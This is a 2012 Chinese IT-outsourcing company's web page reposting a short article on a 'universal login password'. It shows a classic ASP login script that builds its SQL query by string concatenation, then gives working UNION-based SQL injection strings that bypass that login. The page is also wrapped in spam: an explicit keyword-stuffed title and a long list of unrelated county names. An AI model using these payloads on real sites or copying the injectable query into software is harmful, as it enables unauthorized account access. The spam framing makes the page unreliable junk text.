午夜直播免费看-亚洲国产精品日韩av不卡在线-少妇三级全黄-欧美日韩国产一区二区三区,

 
 
 
首 頁
下載中心
站內搜索
新聞中心│News center
行業新聞
最新公告
最新公告│Announcement
IT外包首選我們的八大理由...
中國勞科院與我公司續簽了...
感謝中成航宇與我們公司續...
感謝深圳市城市空間規劃建...
 
詳細內容
當前位置:首 頁 >> 新聞中心 >> 詳細內容
 
 
詳細內容  
 
 
新型萬能登錄密碼
發布時間:2012-12-20 | 點擊次數:2316
  
 
    網上有很多這樣的登陸驗證代碼
  <%
  username=trim(Request.Form("username"))
  password=trim(Request.Form("password"))
  sql="Select * FROM admin Where user='"&username&"'"
  Set rs=Server.CreateObject("adodb.recordset")
  rs.Open sql,conn,1,1
  if rs.eof then
  checksysUser=FALSE
  else
  passwd=trim(rs("pwd"))
  if passwd=password then
  Session("admin")=username
  checksysUser=TRUE
  else
  checksysUser=FALSE
  end if
  End if
  rs.close
  conn.close
  if checksysUser=true then
  Response.Redirect("main.asp")
  else
  errmsg="<font color=#FF0000><b>用戶名輸入有誤,請重新輸入!</b></font>"
  end if
  %>
  先在數據庫中查詢用戶名對應的密碼,然后再和用戶輸入的密碼對比,導致'or'='or'這樣的萬能登陸密碼失
  效.但如果在上面的程序中,用戶名輸入' union   select 1,1,1 FROM admin Where ''=',密碼輸入1,就可以登陸成功,原理很簡單,就不多說了.順便附上oldjun的語句:' union   select 1,1,1 AS pwd FROM admin Where ''=  
編輯:北京信誠IT保姆IT外包部 http:// www.aboverow.cn www.xcit.com.cn
 
關閉
  友情鏈接
深圳無線覆蓋 廣信鴻業 昊瑞爾科技 及好科技 信諾IT服務 北京IT外包 無線覆蓋 起秀網絡
版權所有:北京信誠眾業科技有限公司 總部:010-62075251 400-698-1290 技術支持:010-62365952
地址:北京市北三環中路2號匯鑫祥源大廈328室 京ICP備09096604-3號

 

主站蜘蛛池模板: 格尔木市| 富阳市| 讷河市| 凤庆县| 昌图县| 大理市| 巨鹿县| 田阳县| 鹤庆县| 普定县| 鄂尔多斯市| 大埔县| 宿州市| 武冈市| 盐边县| 霞浦县| 滨州市| 池州市| 攀枝花市| 达州市| 兴宁市| 公主岭市| 元氏县| 南岸区| 安宁市| 莱阳市| 芦山县| 高邑县| 栾城县| 井研县| 奈曼旗| 临猗县| 侯马市| 吴川市| 如东县| 夏邑县| 广丰县| 隆安县| 独山县| 灵宝市| 瓦房店市|